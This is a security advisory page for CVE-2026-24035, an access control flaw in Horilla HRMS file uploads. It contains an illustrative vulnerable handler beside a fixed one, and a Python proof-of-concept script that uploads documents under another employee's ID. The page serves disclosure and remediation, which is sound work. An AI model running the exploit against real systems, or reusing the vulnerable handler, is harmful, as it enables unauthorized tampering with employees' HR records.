Security Vulnerability Report

CVE-2026-24035 (CVSS 4.3, MEDIUM)

Published: 2026-01-22 04:15:59
Last Modified: 2026-01-29 19:02:03

Description

Horilla is a free and open source Human Resource Management System (HRMS). An Improper Access Control vulnerability exists in Horilla HR Software starting in version 1.4.0 and prior to version 1.5.0, allowing any authenticated employee to upload documents on behalf of another employee without proper authorization. The cause is insufficient server-side validation of the employee_id parameter during file upload operations, so any authenticated employee can upload documents on behalf of any other employee. Version 1.5.0 fixes the issue.
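Added example, not Horilla's code: a minimal upload handler that trusts the client-supplied employee_id, beside a hardened form that validates it server-side against the authenticated caller, which is the check whose absence the description identifies. The User and Request classes, the "hr" role name, the in-memory DOCUMENTS store and the 201/400/403 return codes are constructed stand-ins for a real web framework's objects.

```python
from dataclasses import dataclass, field

@dataclass
class User:
    employee_id: int
    roles: set = field(default_factory=set)   # e.g. {"hr"}; hypothetical role name

@dataclass
class Request:
    user: User     # the authenticated caller (from the session, not the form)
    form: dict     # submitted fields, e.g. {"employee_id": "2"}
    files: dict    # uploaded files, e.g. {"document": b"..."}

# Constructed stand-in for the documents table: (owner_id, uploader_id, filename)
DOCUMENTS = []

def create_document_vulnerable(req):
    """Trusts the client-supplied employee_id outright: any authenticated
    employee can file a document under any other employee's record."""
    owner = int(req.form["employee_id"])
    filename = next(iter(req.files))
    DOCUMENTS.append((owner, req.user.employee_id, filename))
    return 201

def can_upload_for(actor, owner_id):
    """Authorization rule: an employee may upload only to their own record;
    HR staff may upload for anyone. The 'hr' role name is hypothetical."""
    return owner_id == actor.employee_id or "hr" in actor.roles

def create_document_fixed(req):
    """Validates employee_id server-side against the authenticated identity.
    Returns 403 and stores nothing when the caller is not authorized; a
    missing employee_id defaults to the caller's own record."""
    if not req.files:
        return 400
    try:
        owner = int(req.form.get("employee_id", req.user.employee_id))
    except (TypeError, ValueError):
        return 400
    if not can_upload_for(req.user, owner):
        return 403
    DOCUMENTS.append((owner, req.user.employee_id, next(iter(req.files))))
    return 201
```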

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
Weakness
CWE-284 (Improper Access Control)

Configurations (Affected Products)

cpe:2.3:a:horilla:horilla:1.4.0:*:*:*:*:*:*:* - VULNERABLE
Horilla HRMS >= 1.4.0
Horilla HRMS < 1.5.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import sys

# CVE-2026-24035 PoC - Horilla HRMS Improper Access Control
# Description: Authenticated user can upload documents on behalf of other employees


def exploit_cve_2026_24035(base_url, attacker_token, target_employee_id):
    """
    Exploit improper access control in Horilla HRMS file upload

    Args:
        base_url: Target Horilla HRMS base URL
        attacker_token: Valid authentication token for attacker account
        target_employee_id: Employee ID of the victim (to upload docs as them)

    Returns:
        bool: True if exploitation appears successful
    """
    upload_endpoint = f"{base_url}/payroll/document/create/"
    headers = {
        "Authorization": f"Bearer {attacker_token}",
        "X-Requested-With": "XMLHttpRequest",
    }

    # Malicious file with target employee's ID
    files = {
        "document": ("exploit.txt", b"Malicious content uploaded via CVE-2026-24035", "text/plain")
    }

    # VULNERABLE: No server-side validation of employee_id
    data = {
        "employee_id": target_employee_id,  # Attacker can specify any employee
        "title": "Unauthorized Document Upload",
        "description": "Document uploaded by exploiting CVE-2026-24035",
    }

    try:
        response = requests.post(upload_endpoint, headers=headers, files=files, data=data, timeout=30)
        if response.status_code == 200 or response.status_code == 201:
            print(f"[+] Successfully uploaded document for employee_id: {target_employee_id}")
            print("[+] Exploitation successful - improper access control bypassed")
            return True
        else:
            print(f"[-] Upload failed with status: {response.status_code}")
            return False
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return False


if __name__ == "__main__":
    if len(sys.argv) != 4:
        print("Usage: python cve_2026_24035.py <base_url> <attacker_token> <target_employee_id>")
        sys.exit(1)
    base_url = sys.argv[1]
    attacker_token = sys.argv[2]
    target_employee_id = sys.argv[3]
    exploit_cve_2026_24035(base_url, attacker_token, target_employee_id)
```

References

https://github.com/horilla-opensource/horilla/security/advisories/GHSA-fm3f-xpgx-8xr3 (Vendor Advisory, Exploit)
https://github.com/horilla-opensource/horilla/releases/tag/1.5.0 (Release Notes)
https://drive.google.com/file/d/1i00-NnipvxH8bGY-SyqEjnDQfxIbVGRR/view?usp=sharing (Exploit)
